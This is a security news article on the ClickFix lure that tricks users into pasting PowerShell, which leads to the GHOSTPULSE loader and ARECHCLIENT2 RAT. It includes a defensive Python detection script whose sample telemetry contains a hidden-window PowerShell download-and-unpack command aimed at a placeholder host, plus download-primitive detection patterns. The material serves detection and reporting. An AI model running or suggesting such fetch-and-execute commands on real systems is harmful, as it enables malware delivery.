ClickFix technique widely used to deliver multi-stage malware campaigns

Malicious actors are increasingly leveraging a sophisticated social engineering tactic known as ‘ClickFix’ to deliver multi-stage malware campaigns targeting users across various sectors, according to a new report from Elastic Security Labs.

ClickFix, first observed last year, tricks victims into copying and pasting malicious PowerShell that results in malware execution. Once triggered, the commands initiate a complex infection chain designed to evade detection and compromise systems.

Elastic’s latest telemetry reveals that ClickFix is increasingly being used to distribute updated variants of the GHOSTPULSE loader (aka HIJACKLOADER or IDATLOADER), that downloads the ARECHCLIENT2 remote access trojan (RAT) and infostealer.

In recent campaigns analyzed by Elastic, the infection starts with the ClickFix lure, leading users to launch a PowerShell script that downloads a ZIP file named ComponentStyle.zip. Inside are components for a DLL sideloading attack, including a benign executable (Crysta_X64.exe) and a malicious DLL (DllXDownloadManager.dll). These are used to decrypt and load additional files, including Heeschamjet.rc and Shonomteak.bxi, which contain encrypted payloads and configuration data.
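As an added illustration, not code from Elastic's report or this article, the following Python triage routine flags the two process-creation patterns the chain above produces in endpoint telemetry: PowerShell launched from explorer.exe (the parent a pasted Run-dialog or shell command typically has) with a download or archive command line, and an executable started by PowerShell from a user-writable directory, which is where the sideloading pair lands. The sample events, user paths and the host name example.invalid are constructed.

```python
import re

# Constructed Sysmon Event ID 1 style records, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://example.invalid/ComponentStyle.zip '
                    r'-OutFile $env:TEMP\ComponentStyle.zip; Expand-Archive ..."'},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\ComponentStyle\Crysta_X64.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"Crysta_X64.exe"},
    # Benign admin usage: PowerShell from explorer.exe running a local script.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
]

# Download / unpack primitives a pasted ClickFix one-liner relies on.
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|downloadfile|"
    r"start-bitstransfer|expand-archive|\.zip\b)", re.I)
# Directories an unprivileged user can write to (sideloading staging area).
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)


def is_powershell(path):
    return path.lower().endswith(("powershell.exe", "pwsh.exe"))


def triage(events):
    """Return (rule_name, image) pairs for events matching either pattern."""
    hits = []
    for ev in events:
        img, parent, cmd = ev["Image"], ev["ParentImage"], ev["CommandLine"]
        # Rule 1: interactive PowerShell (parent explorer.exe) fetching/unpacking.
        if (is_powershell(img) and parent.lower().endswith("explorer.exe")
                and DOWNLOAD_RE.search(cmd)):
            hits.append(("clickfix_paste", img))
        # Rule 2: PowerShell launching a binary from a user-writable path.
        if (is_powershell(parent) and not is_powershell(img)
                and USER_WRITABLE_RE.search(img)):
            hits.append(("user_dir_exec_from_powershell", img))
    return hits


if __name__ == "__main__":
    for rule, image in triage(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

Rule 1 alone will also fire on legitimate users who paste download commands, so in production it is best scored together with the DLL-sideload follow-on in rule 2 rather than alerted on by itself.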

The GHOSTPULSE loader, which has been active since 2023 and regularly updated with new evasion techniques, deploys an intermediate .NET loader, which, in turn, loads ARECHCLIENT2 directly into memory using reflective techniques. This multi-layered strategy helps bypass antivirus detection and ensures stealthy data exfiltration.

First seen in 2019, ARECHCLIENT2 (aka SECTOPRAT) is capable of harvesting sensitive data, executing commands remotely, and maintaining persistent access.

Elastic’s infrastructure analysis indicates that the threat actors have been using a compromised digital advertising agency’s server to host and distribute the malicious content. The campaign also relies on a constantly shifting network of command-and-control (C2) servers, with over 120 unique servers across various autonomous systems identified in the past seven months alone.
